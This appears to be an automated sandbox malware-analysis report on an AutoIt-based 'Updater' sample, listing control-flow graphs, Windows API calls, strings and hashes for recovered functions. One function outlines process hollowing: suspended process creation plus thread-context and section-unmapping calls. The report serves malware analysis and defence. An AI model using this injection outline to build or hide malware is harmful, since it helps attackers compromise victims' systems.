                                                                                                                                                    control_flow_graph 0 b351fb-b3522a call b4042b call b35d68 5 b78d54-b78d58 0->5 6 b35230-b35243 call b32960 0->6 7 b35245-b35262 5->7 8 b78d5e 5->8 6->7 12 b35264 7->12 13 b35269-b35276 7->13 10 b78d64-b78d6a 8->10 10->7 16 b78d70-b78d73 10->16 12->13 14 b78d7a-b78d7c 13->14 15 b3527c-b35282 13->15 17 b78d87 14->17 15->17 18 b35288-b35298 15->18 16->10 19 b78d75 16->19 20 b78d92-b78d97 17->20 18->20 21 b3529e-b352b3 18->21 19->7 24 b78dc9-b78de1 call b34e5a 20->24 25 b78d99-b78d9b 20->25 22 b352b9-b352bd 21->22 23 b78e5a 21->23 26 b352c3-b352c6 22->26 27 b78e62 22->27 23->27 40 b78df5-b78e45 GetWindowRect GetClientRect GetSystemMetrics * 2 24->40 41 b78de3-b78dee 24->41 29 b78da0 25->29 30 b352f5-b352f9 26->30 31 b352c8-b352f2 SystemParametersInfoW GetSystemMetrics 26->31 36 b78e6a-b78e6e 27->36 33 b78da2-b78dac call b35c2e 29->33 34 b78dae-b78db9 29->34 38 b35341-b3539c SetRect AdjustWindowRectEx CreateWindowExW 30->38 39 b352fb-b3532e SystemParametersInfoW GetSystemMetrics 30->39 31->30 37 b78dc2 33->37 34->37 43 b78e74-b78e78 36->43 44 b78dbb-b78dbd call bb8251 36->44 37->24 46 b353a2-b35405 SetWindowLongW GetClientRect GetStockObject SendMessageW call b34b74 38->46 47 b78d9d 38->47 39->38 45 b35330-b3533e GetSystemMetrics 39->45 48 b78e47-b78e4f GetSystemMetrics 40->48 49 b78e52 40->49 41->40 43->44 51 b78e7e-b78e82 call b3544c 43->51 44->37 45->38 56 b35407-b35418 SetTimer 46->56 57 b3541d-b3543b call b35915 46->57 47->29 48->49 49->23 55 b78e87 51->55 55->55 56->57 57->36 60 b35441-b35449 57->60
                                                                                                                                                    APIs
                                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00B352D2
                                                                                                                                                    • GetSystemMetrics.USER32(00000007), ref: 00B352DA
                                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00B35305
                                                                                                                                                    • GetSystemMetrics.USER32(00000008), ref: 00B3530D
                                                                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 00B35332
                                                                                                                                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00B3534F
                                                                                                                                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00B3535F
                                                                                                                                                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00B35392
                                                                                                                                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00B353A6
                                                                                                                                                    • GetClientRect.USER32(00000000,000000FF), ref: 00B353C4
                                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 00B353E0
                                                                                                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00B353EB
                                                                                                                                                      • Part of subcall function 00B34B74: GetCursorPos.USER32(?), ref: 00B34B88
                                                                                                                                                      • Part of subcall function 00B34B74: ScreenToClient.USER32(00000000,?), ref: 00B34BA5
                                                                                                                                                      • Part of subcall function 00B34B74: GetAsyncKeyState.USER32(00000001), ref: 00B34BCE
                                                                                                                                                      • Part of subcall function 00B34B74: GetAsyncKeyState.USER32(00000002), ref: 00B34BE8
                                                                                                                                                    • SetTimer.USER32(00000000,00000000,00000028,00B33AA8), ref: 00B35412
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                    • String ID: AutoIt v3 GUI
                                                                                                                                                    • API String ID: 1458621304-248962490
                                                                                                                                                    • Opcode ID: bd824ebc359c5fd60f9743d8ced41e0407bedab20a3b33bae400afbc671a9af2
                                                                                                                                                    • Instruction ID: 3959b84573275eef0fbf395da382621a585a9ea19d73de7aa97ab791f6cd06bb
                                                                                                                                                    • Opcode Fuzzy Hash: bd824ebc359c5fd60f9743d8ced41e0407bedab20a3b33bae400afbc671a9af2
                                                                                                                                                    • Instruction Fuzzy Hash: CEB1507564020A9FDB24DFA8DC89BAE3BF5FB48710F104269FA19A72D0DB74A840CB51
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message$DispatchSleepTimeTranslatetime
                                                                                                                                                    • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                                                                                                                                    • API String ID: 1406140084-758534266
                                                                                                                                                    • Opcode ID: fd0447601d72daa8d112e03aefe63104c0f1a4fa7cfa8686c578bbdf8bc87765
                                                                                                                                                    • Instruction ID: 9570fdfa566dd591b6e9e5c13656f9ca8b8507e2c572717e7eda31ceb1f32f00
                                                                                                                                                    • Opcode Fuzzy Hash: fd0447601d72daa8d112e03aefe63104c0f1a4fa7cfa8686c578bbdf8bc87765
                                                                                                                                                    • Instruction Fuzzy Hash: F0521F70608342DFDB24DF20D885BBAB7E4FF81304F1445ADE59A9B291DB74A984CB93

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 369 1408639-1408688 call 13f1b01 * 2 374 140868a call 1403eb5 369->374 375 140868f-1408696 369->375 374->375 376 1408c25-1408c57 call 13f1699 call 13f1675 call 13f1699 375->376 377 140869c-14086aa 375->377 377->376 379 14086b0-14086c5 377->379 379->376 381 14086cb-14086f9 call 1407b09 * 2 379->381 391 1408703 381->391 392 14086fb-1408701 381->392 393 1408709-1408714 391->393 392->393 394 1408774-140879c call 13f1b11 CreateProcessA 393->394 395 1408716-1408745 call 13f1b11 * 2 CreateProcessA 393->395 400 14087f4-1408803 call 1408491 394->400 401 140879e-14087bc CreateProcessA 394->401 395->400 408 140874b-1408769 CreateProcessA 395->408 411 1408809-140884c call 140430d call 1408221 400->411 412 1408bea-1408bec 400->412 401->400 403 14087be-14087ee call 13f5309 call 13f1b11 CreateProcessA 401->403 403->376 403->400 408->376 409 140876f 408->409 409->400 422 1408852-1408869 411->422 423 1408afa-1408b2f call 140430d 411->423 413 1408c20 GetTickCount 412->413 414 1408bee-1408c1b call 140430d 412->414 413->376 414->413 425 14088e6-14088ff call 14082bd 422->425 426 140886b-14088a3 call 140430d 422->426 430 1408b31-1408b46 call 1408639 423->430 431 1408b4b-1408b4e 423->431 433 1408904 425->433 437 14088a5-14088c6 call 14082bd 426->437 438 14088c8-14088e4 call 14082bd 426->438 430->376 435 1408b50-1408b65 call 1408639 431->435 436 1408b6a-1408b8b call 13f195d call 14070d1 431->436 439 1408907-140890b 433->439 435->376 436->376 437->439 438->439 440 140892d-1408931 439->440 441 140890d-1408911 439->441 449 1408934-1408936 440->449 447 1408913-1408923 call 1408285 441->447 448 1408925-1408927 441->448 447->448 463 1408929-140892b 447->463 448->449 455 1408a63-1408a99 call 140430d 449->455 456 140893c-140897b call 1408595 call 1408355 449->456 465 1408ab5-1408ab8 455->465 466 1408a9b-1408ab0 call 1408639 455->466 475 1408981-140898c 456->475 476 1408a4a-1408a4e 456->476 463->449 469 1408ad4-1408af5 call 13f195d call 14070d1 465->469 470 1408aba-1408acf call 1408639 465->470 466->376 469->376 470->376 481 14089bd-14089f7 call 140430d call 1408221 475->481 482 140898e-14089b8 call 14084d1 call 1407afd 475->482 479 1408b90-1408be5 call 140430d 476->479 480 1408a54-1408a5e call 13f30bd 476->480 479->412 480->479 481->476 495 14089f9-1408a42 call 1408355 call 140430d 481->495 482->481 499 1408a47 495->499 499->476
                                                                                                                                                    APIs
                                                                                                                                                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,01408C58), ref: 0140873E
                                                                                                                                                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,01408C58,00000000,00000000,00000000,00000000,00000000,00000004), ref: 01408762
                                                                                                                                                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,01408C58), ref: 01408795
                                                                                                                                                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,01408C58,00000000,00000000,00000000,00000000,00000000,00000004), ref: 014087B5
                                                                                                                                                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,01408C58,00000000,00000000,00000000,00000000,00000000,00000004), ref: 014087E7
                                                                                                                                                      • Part of subcall function 0140430D: GetTickCount.KERNEL32 ref: 01404386
                                                                                                                                                      • Part of subcall function 014070D1: MessageBoxA.USER32(00000000,00000000,01407131,00040040), ref: 01407104
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 01408C20
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227830347.00000000013EB000.00000040.00000020.00020000.00000000.sdmp, Offset: 013EB000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_13eb000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateProcess$CountTick$Message
                                                                                                                                                    • String ID: execution failure, try to assign other file path$D$NtFreeVirtualMemory$NtGetContextThread$NtResumeThread$NtSetContextThread$NtTerminateProcess$NtUnmapViewOfSection
                                                                                                                                                    • API String ID: 2713535555-1661097759
                                                                                                                                                    • Opcode ID: 09b8db2fc57209297c8fd90c486d13001622533dd64e5f5e280ce2b1c31ab6b7
                                                                                                                                                    • Instruction ID: 334633ee54c81e976863d1fa95f8335b1ba187097256eda0765b44cba3c618b5
                                                                                                                                                    • Opcode Fuzzy Hash: 09b8db2fc57209297c8fd90c486d13001622533dd64e5f5e280ce2b1c31ab6b7
                                                                                                                                                    • Instruction Fuzzy Hash: 48120D70E0021AAFDB51DBAACD81FDEBBF4AB18704F1440AAE644E72D1D770A9448F61

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00B350AD
                                                                                                                                                    • RegisterClassExW.USER32(00000030), ref: 00B350D7
                                                                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B350E8
                                                                                                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 00B35105
                                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00B35115
                                                                                                                                                    • LoadIconW.USER32(000000A9), ref: 00B3512B
                                                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00B3513A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                    • API String ID: 2914291525-1005189915
                                                                                                                                                    • Opcode ID: 96dd8fd50cf7716fa89d0341a390209edb4aec02518c1872ab09b58831cde89d
                                                                                                                                                    • Instruction ID: d61935f6afe6b972d457cbf4b75f5422612e5078ca56f1abccd67b8c06259a16
                                                                                                                                                    • Opcode Fuzzy Hash: 96dd8fd50cf7716fa89d0341a390209edb4aec02518c1872ab09b58831cde89d
                                                                                                                                                    • Instruction Fuzzy Hash: DD21B4B5901218AFDB00DFA4EC89AEDBBF4FB08710F10425AF611A72A0EBB94544CF95

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 626 13f0329-13f033d 627 13f0349-13f034f 626->627 628 13f0356-13f035b 627->628 629 13f0351-13f0354 627->629 631 13f035d-13f0363 628->631 632 13f036a-13f0372 628->632 629->628 630 13f033f-13f0347 CharNextA 629->630 630->627 631->632 633 13f0365-13f0368 631->633 634 13f03cf-13f03d4 632->634 633->627 635 13f03d6-13f03f3 call 13f1c41 634->635 636 13f0374-13f0379 634->636 642 13f0470-13f0475 635->642 637 13f03bb-13f03cd CharNextA 636->637 638 13f037b-13f0385 CharNextA 636->638 637->634 640 13f039b-13f03a1 638->640 643 13f03a8-13f03ad 640->643 644 13f03a3-13f03a6 640->644 647 13f047b-13f048c 642->647 648 13f03f5-13f03fa 642->648 643->634 646 13f03af-13f03b9 CharNextA 643->646 644->643 645 13f0387-13f0399 CharNextA 644->645 645->640 646->634 649 13f044c-13f045a CharNextA 648->649 650 13f03fc-13f0406 CharNextA 648->650 649->642 652 13f045c-13f046e 649->652 651 13f042c-13f0432 650->651 653 13f0439-13f043e 651->653 654 13f0434-13f0437 651->654 652->642 652->652 653->642 656 13f0440-13f044a CharNextA 653->656 654->653 655 13f0408-13f0416 CharNextA 654->655 655->651 657 13f0418-13f042a 655->657 656->642 657->651 657->657
                                                                                                                                                    APIs
                                                                                                                                                    • CharNextA.USER32(00000000), ref: 013F037E
                                                                                                                                                    • CharNextA.USER32(00000000,00000000), ref: 013F038A
                                                                                                                                                    • CharNextA.USER32(00000000,00000000), ref: 013F03B2
                                                                                                                                                    • CharNextA.USER32(00000000), ref: 013F03BE
                                                                                                                                                    • CharNextA.USER32(?,00000000), ref: 013F03FF
                                                                                                                                                    • CharNextA.USER32(00000000,?,00000000), ref: 013F040B
                                                                                                                                                    • CharNextA.USER32(00000000,?,00000000), ref: 013F0443
                                                                                                                                                    • CharNextA.USER32(?,00000000), ref: 013F044F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227830347.00000000013EB000.00000040.00000020.00020000.00000000.sdmp, Offset: 013EB000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_13eb000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CharNext
                                                                                                                                                    • String ID: $"$"
                                                                                                                                                    • API String ID: 3213498283-938660540
                                                                                                                                                    • Opcode ID: a74b84504903bc6848e67ef457c7a6e515321d0edc5c07087f1d644512264336
                                                                                                                                                    • Instruction ID: f879c365005c086628c34a5fd23e3d5576f726b61d1e3f6422efab8956554099
                                                                                                                                                    • Opcode Fuzzy Hash: a74b84504903bc6848e67ef457c7a6e515321d0edc5c07087f1d644512264336
                                                                                                                                                    • Instruction Fuzzy Hash: 0351E770A05286DFD325DFADC484A1ABBE6EF19354B64089EF6C5CB352D730A840DF51

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 658 b60585-b605b5 call b60359 661 b605b7-b605c2 call b526b9 658->661 662 b605d0-b605dc call b5504f 658->662 669 b605c4-b605cb call b526cc 661->669 667 b605f5-b6063e call b602c4 662->667 668 b605de-b605f3 call b526b9 call b526cc 662->668 677 b60640-b60649 667->677 678 b606ab-b606b4 GetFileType 667->678 668->669 679 b608a7-b608ad 669->679 683 b60680-b606a6 GetLastError call b52696 677->683 684 b6064b-b6064f 677->684 680 b606b6-b606e7 GetLastError call b52696 CloseHandle 678->680 681 b606fd-b60700 678->681 680->669 695 b606ed-b606f8 call b526cc 680->695 687 b60702-b60707 681->687 688 b60709-b6070f 681->688 683->669 684->683 689 b60651-b6067e call b602c4 684->689 692 b60713-b60761 call b54f98 687->692 688->692 693 b60711 688->693 689->678 689->683 700 b60763-b6076f call b604d5 692->700 701 b60771-b60795 call b60077 692->701 693->692 695->669 700->701 707 b60799-b607a3 call b584de 700->707 708 b60797 701->708 709 b607a8-b607eb 701->709 707->679 708->707 711 b6080c-b6081a 709->711 712 b607ed-b607f1 709->712 715 b608a5 711->715 716 b60820-b60824 711->716 712->711 714 b607f3-b60807 712->714 714->711 715->679 716->715 717 b60826-b60859 CloseHandle call b602c4 716->717 720 b6088d-b608a1 717->720 721 b6085b-b60887 GetLastError call b52696 call b55161 717->721 720->715 721->720
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00B602C4: CreateFileW.KERNELBASE(00000000,00000000,?,00B6062E,?,?,00000000,?,00B6062E,00000000,0000000C), ref: 00B602E1
                                                                                                                                                    • GetLastError.KERNEL32 ref: 00B60699
                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00B606A0
                                                                                                                                                    • GetFileType.KERNELBASE(00000000), ref: 00B606AC
                                                                                                                                                    • GetLastError.KERNEL32 ref: 00B606B6
                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00B606BF
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00B606DF
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00B60829
                                                                                                                                                    • GetLastError.KERNEL32 ref: 00B6085B
                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00B60862
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                    • String ID: H
                                                                                                                                                    • API String ID: 4237864984-2852464175
                                                                                                                                                    • Opcode ID: 410f27f7e20b1f2a5ce36bec7d5ab985a65c07de0cce0e0a68e321972adaba67
                                                                                                                                                    • Instruction ID: 5812b6b692c47fe7b9b159045a98d08055e54c0c1f766678d7a9a0d2d4ea91aa
                                                                                                                                                    • Opcode Fuzzy Hash: 410f27f7e20b1f2a5ce36bec7d5ab985a65c07de0cce0e0a68e321972adaba67
                                                                                                                                                    • Instruction Fuzzy Hash: 1FA11532A241449FDF19EF68D891BAE7BE0EB06321F1401D9F811AB3D2DB799C16CB51

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00B21155: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF), ref: 00B21173
                                                                                                                                                      • Part of subcall function 00B3FD48: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00B30F35), ref: 00B3FD6A
                                                                                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00B30F78
                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00B76FEF
                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00B77030
                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00B77072
                                                                                                                                                    • _wcslen.LIBCMT ref: 00B770D9
                                                                                                                                                    • _wcslen.LIBCMT ref: 00B770E8
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                                    • API String ID: 98802146-2727554177
                                                                                                                                                    • Opcode ID: 105f1bdaaa786014d734a870c2881b2f35af67367ffdd1126fcf940aa564c72f
                                                                                                                                                    • Instruction ID: 92704e63f513c8e95c1ce0af99f6cc80518a47789e9670eed06cbce03d833500
                                                                                                                                                    • Opcode Fuzzy Hash: 105f1bdaaa786014d734a870c2881b2f35af67367ffdd1126fcf940aa564c72f
                                                                                                                                                    • Instruction Fuzzy Hash: EB715A715083019EC704EF65E8819BABBF8FF98B40F4048AEF549C71A0EF709A48CB56

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00B32C5C
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00B32C6B
                                                                                                                                                    • LoadIconW.USER32(00000063), ref: 00B32C81
                                                                                                                                                    • LoadIconW.USER32(000000A4), ref: 00B32C93
                                                                                                                                                    • LoadIconW.USER32(000000A2), ref: 00B32CA5
                                                                                                                                                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00B32CBD
                                                                                                                                                    • RegisterClassExW.USER32(?), ref: 00B32D0E
                                                                                                                                                      • Part of subcall function 00B3507A: GetSysColorBrush.USER32(0000000F), ref: 00B350AD
                                                                                                                                                      • Part of subcall function 00B3507A: RegisterClassExW.USER32(00000030), ref: 00B350D7
                                                                                                                                                      • Part of subcall function 00B3507A: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B350E8
                                                                                                                                                      • Part of subcall function 00B3507A: InitCommonControlsEx.COMCTL32(?), ref: 00B35105
                                                                                                                                                      • Part of subcall function 00B3507A: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00B35115
                                                                                                                                                      • Part of subcall function 00B3507A: LoadIconW.USER32(000000A9), ref: 00B3512B
                                                                                                                                                      • Part of subcall function 00B3507A: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00B3513A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                    • String ID: #$0$AutoIt v3
                                                                                                                                                    • API String ID: 423443420-4155596026
                                                                                                                                                    • Opcode ID: 7add84611062dd9ad367f4ecc1efe08cc9e7787ac0177f9d5cf75955f4038b65
                                                                                                                                                    • Instruction ID: 870ecafd26a1f5c3cfa3195f45c1ea904c1d29b27fb96c277fd5e0ab52b1ae40
                                                                                                                                                    • Opcode Fuzzy Hash: 7add84611062dd9ad367f4ecc1efe08cc9e7787ac0177f9d5cf75955f4038b65
                                                                                                                                                    • Instruction Fuzzy Hash: C52103B5D01318AFEB109FA5EC45BAABFF4FB48710F10412AF504A72A0DBB94950CF98

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 799 b33998-b339ad 800 b339af-b339b2 799->800 801 b33a0d-b33a0f 799->801 803 b33a13 800->803 804 b339b4-b339bb 800->804 801->800 802 b33a11 801->802 805 b339f8-b33a00 DefWindowProcW 802->805 806 b780b1-b780d9 call b2ad2c call b2ad46 803->806 807 b33a19-b33a1e 803->807 808 b339c1-b339c6 804->808 809 b33a8d-b33a95 PostQuitMessage 804->809 813 b33a06-b33a0c 805->813 842 b780de-b780e5 806->842 815 b33a20-b33a23 807->815 816 b33a45-b33a6c SetTimer RegisterWindowMessageW 807->816 810 b7811e-b78132 call b8cde4 808->810 811 b339cc-b339d0 808->811 814 b33a41-b33a43 809->814 810->814 834 b78138 810->834 817 b33a97-b33aa1 call b33619 811->817 818 b339d6-b339db 811->818 814->813 822 b78052-b78055 815->822 823 b33a29-b33a3c KillTimer call b335b3 call b3514d 815->823 816->814 819 b33a6e-b33a79 CreatePopupMenu 816->819 836 b33aa6 817->836 824 b339e1-b339e6 818->824 825 b78103-b7810a 818->825 819->814 829 b78057-b7805b 822->829 830 b7808d-b780ac MoveWindow 822->830 823->814 832 b33a7b-b33a8b call b336c0 824->832 833 b339ec-b339f2 824->833 825->805 840 b78110-b78119 call b81bdd 825->840 837 b7805d-b78060 829->837 838 b7807c-b78088 SetFocus 829->838 830->814 832->814 833->805 833->842 834->805 836->814 837->833 843 b78066-b78077 call b2ad2c 837->843 838->814 840->805 842->805 848 b780eb-b780fe call b335b3 call b334c7 842->848 843->814 848->805
                                                                                                                                                    APIs
                                                                                                                                                    • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00B33992,?,?), ref: 00B33A00
                                                                                                                                                    • KillTimer.USER32(?,00000001,?,?,?,?,?,00B33992,?,?), ref: 00B33A2C
                                                                                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00B33A4F
                                                                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00B33992,?,?), ref: 00B33A5A
                                                                                                                                                    • CreatePopupMenu.USER32 ref: 00B33A6E
                                                                                                                                                    • PostQuitMessage.USER32(00000000), ref: 00B33A8F
                                                                                                                                                    Strings
